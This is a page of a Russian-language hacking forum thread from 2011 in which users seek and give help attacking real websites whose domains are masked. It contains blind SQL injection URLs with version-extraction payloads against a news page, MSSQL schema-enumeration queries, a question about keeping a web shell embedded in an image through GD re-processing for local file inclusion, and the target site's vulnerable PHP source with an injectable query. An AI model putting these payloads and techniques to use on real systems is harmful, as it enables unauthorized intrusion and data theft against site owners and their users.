Вопросы по уязвимостям - Страница 98

Nightmare · 27.04.2011, 06:18

Наткнулся на одну MsSQL иньекцию... получил командой из information_schema название всех баз данных на сайте, но как только попытался узнать таблицы в какой нибудь из них, никак не получается вытащить вообще.
В связи с этим вопрос, в MSSQL по другому как то работает information_schema ?
То есть там в порядке вещей, что можно смотреть названия баз, но нельзя смотреть названия таблиц, или же у меня попросту запрос не получился?

M_script · 27.04.2011, 15:42

Nightmare, из какой таблицы information_schema пытался получить имена таблиц?
Дай ссылку, быстрее будет.

Nightmare · 27.04.2011, 16:00

Цитата:

Сообщение от M_script

Nightmare, из какой таблицы information_schema пытался получить имена таблиц?
Дай ссылку, быстрее будет.

На этот раз к сожалению без ссылки. Я MSSQL раскручиваю как MySQL, ибо там ошибки нету, и соответственно вывода в неё как во всех мануалах.
Так вот, вывожу базы запросом select schema_name from information_schema.schemata, все выводятся.
Далее вывожу таблицы: select table_name from information_schema.tables where schema_name='lol'
Не катит, и этот не катит: select table_name from information_schema.tables where table_schema='lol'
ну ладно... вывожу тогда просто select table_name from information_schema.tables вместо лимита юзаю TOP, всё выводится, но лишь только то, что пренадлежит одной базе.. и всё... то есть пару таблиц выводится и конец... хотя ведь по идее в базе (information_schema.tables) должны лежать ВСЕ таблицы, а не только таблицы какой то конкретной базы.

M_script · 27.04.2011, 16:19

Microsoft SQL Server позволяет контролировать доступ пользователей к конкретным файлам базы данных, в том числе доступ к определенным таблицам, записям и полям. Попробуй через получить имена из других таблиц, например KEY_COLUMN_USAGE.

opium · 29.04.2011, 02:30

Есть один сайт с локальным инклудом. Там есть возможность залива картинок.
Но картинки обрабатываются (как-то) библиотекой GD, следовательно шелл, который я помещаю в конец картинки затирается =(

Кто сталкивался с подобной проьблемой и нашёл выход из неё? как или куда записать шелл (в картинку), чтобы он не затирался?

картинка приобретает подпись:
gd-jpeg v1.0 (using IJG JPEG v62), quality = 90

Nightmare · 29.04.2011, 06:08

Какая то хитрая SQL:
http://www.***.ru/conews.phtml?id=4781
Работают операторы AND и OR, остальные почему то не пашут у меня.
http://www.***.ru/conews.phtml?id=4781+or+1=2 - выводит эту же страницу
http://www.***.ru/conews.phtml?id=4781+or+1=1 - не выводит ничего
То есть тут логика такая, что or+1=1 - ложь, а or+1=2 - верно.
Хз как раскрутить, если полностью слепая, тогда хрен с ней, если вывод возможен, буду благодарен.

nobody · 29.04.2011, 08:47

Цитата:

Сообщение от Nightmare

Какая то хитрая SQL:
http://www.***.ru/conews.phtml?id=4781
Работают операторы AND и OR, остальные почему то не пашут у меня.
http://www.***.ru/conews.phtml?id=4781+or+1=2 - выводит эту же страницу
http://www.***.ru/conews.phtml?id=4781+or+1=1 - не выводит ничего
То есть тут логика такая, что or+1=1 - ложь, а or+1=2 - верно.
Хз как раскрутить, если полностью слепая, тогда хрен с ней, если вывод возможен, буду благодарен.

почему or ?
id=4781+and+1=2- false
id=4781+and+1=1 - true

Код:

http://www.***.ru/conews.phtml?id=4781+and+5=find_in_set(substring(version(),1,1),'1,2,3,4,5')

нормально всё работает, блинд обычный

durito · 29.04.2011, 12:02

Nightmare
http://www.***.ru/conews.phtml?id=4781+and%20substring%28version%28% 29,1,1%29=5

слепая

}{оттабыч · 29.04.2011, 17:44

register_globals On

да, там слепая дейстительно, судя по исходному коду

conews.phtml

PHP код:


			
...
 if (isset($id)) {

           DisplayUnit(2973,$id,"templates/news/Body.phtml");

   } else if(isset($news)&&($news=="all")){
...

include/unit_func.php3

PHP код:


			
function DisplayUnit($ParentID,$UnitID,$BodyTmpl,$LINE_NUMBER=1,$Attributes = "ALL")

{

        $DB_ATTRTEXT = array();

        $DB_ATTRDATA = array();

        $DB_ATTRVALS = array();

        $DB_FIELDTYPE = array();

        $DB_ATTRIBUTES = array();

        if($UnitID == "") { $UnitID = 0; }

        if($Attributes == "") { $Attributes = "ALL"; }

        $sqlStr = "select * from tblUnits where unitid=".$UnitID;

        $res = mysql_query($sqlStr);

        $DB_UNITDATA = @mysql_fetch_array($res);

        $DB_UNITDATA["parentid"] = $ParentID;

        @mysql_free_result($res);

        if($DB_UNITDATA["formid"] > 0)
       
        {
        ...// вот в этом месте есть (возможно) 2-d order inj.
        }

}

xCedz · 29.04.2011, 19:32

там и без исходного понятно что слепая)

29.04.2011, 06:08	#976
Nightmare Banned Регистрация: 06.07.2010 Сообщений: 162 Репутация: 10	Какая то хитрая SQL: http://www.*.ru/conews.phtml?id=4781 Работают операторы AND и OR, остальные почему то не пашут у меня. http://www..ru/conews.phtml?id=4781+or+1=2 - выводит эту же страницу http://www.*.ru/conews.phtml?id=4781+or+1=1 - не выводит ничего То есть тут логика такая, что or+1=1 - ложь, а or+1=2 - верно. Хз как раскрутить, если полностью слепая, тогда хрен с ней, если вывод возможен, буду благодарен. Последний раз редактировалось Twost; 16.05.2013 в 10:18..*

29.04.2011, 12:02	#978
durito Регистрация: 02.03.2011 Сообщений: 76 Репутация: 2	Nightmare http://www.**.ru/conews.phtml?id=4781+and%20substring%28version%28% 29,1,1%29=5 слепая Последний раз редактировалось Twost; 16.05.2013 в 10:19..*

29.04.2011, 17:44	#979
}{оттабыч Banned Регистрация: 08.10.2010 Сообщений: 188 Репутация: 53	register_globals On да, там слепая дейстительно, судя по исходному коду conews.phtml PHP код: `... if (isset($id)) { DisplayUnit(2973,$id,"templates/news/Body.phtml"); } else if(isset($news)&&($news=="all")){ ...` include/unit_func.php3 PHP код: function DisplayUnit($ParentID,$UnitID,$BodyTmpl,$LINE_NUMBER=1,$Attributes = "ALL") { $DB_ATTRTEXT = array(); $DB_ATTRDATA = array(); $DB_ATTRVALS = array(); $DB_FIELDTYPE = array(); $DB_ATTRIBUTES = array(); if($UnitID == "") { $UnitID = 0; } if($Attributes == "") { $Attributes = "ALL"; } $sqlStr = "select * from tblUnits where unitid=".$UnitID; $res = mysql_query($sqlStr); $DB_UNITDATA = @mysql_fetch_array($res); $DB_UNITDATA["parentid"] = $ParentID; @mysql_free_result($res); if($DB_UNITDATA["formid"] > 0) { ...// вот в этом месте есть (возможно) 2-d order inj. } }

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

27.04.2011, 06:18	#971
Nightmare Banned Регистрация: 06.07.2010 Сообщений: 162 Репутация: 10	Наткнулся на одну MsSQL иньекцию... получил командой из information_schema название всех баз данных на сайте, но как только попытался узнать таблицы в какой нибудь из них, никак не получается вытащить вообще. В связи с этим вопрос, в MSSQL по другому как то работает information_schema ? То есть там в порядке вещей, что можно смотреть названия баз, но нельзя смотреть названия таблиц, или же у меня попросту запрос не получился?

27.04.2011, 15:42	#972
M_script Регистрация: 06.07.2010 Сообщений: 113 Репутация: 33	Nightmare, из какой таблицы information_schema пытался получить имена таблиц? Дай ссылку, быстрее будет.

27.04.2011, 16:19	#974
M_script Регистрация: 06.07.2010 Сообщений: 113 Репутация: 33	Microsoft SQL Server позволяет контролировать доступ пользователей к конкретным файлам базы данных, в том числе доступ к определенным таблицам, записям и полям. Попробуй через получить имена из других таблиц, например KEY_COLUMN_USAGE.

29.04.2011, 02:30	#975
opium Регистрация: 10.09.2010 Сообщений: 37 Репутация: 0	Есть один сайт с локальным инклудом. Там есть возможность залива картинок. Но картинки обрабатываются (как-то) библиотекой GD, следовательно шелл, который я помещаю в конец картинки затирается =( Кто сталкивался с подобной проьблемой и нашёл выход из неё? как или куда записать шелл (в картинку), чтобы он не затирался? картинка приобретает подпись: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90

29.04.2011, 19:32	#980
xCedz Регистрация: 05.07.2010 Сообщений: 33 Репутация: 6	там и без исходного понятно что слепая)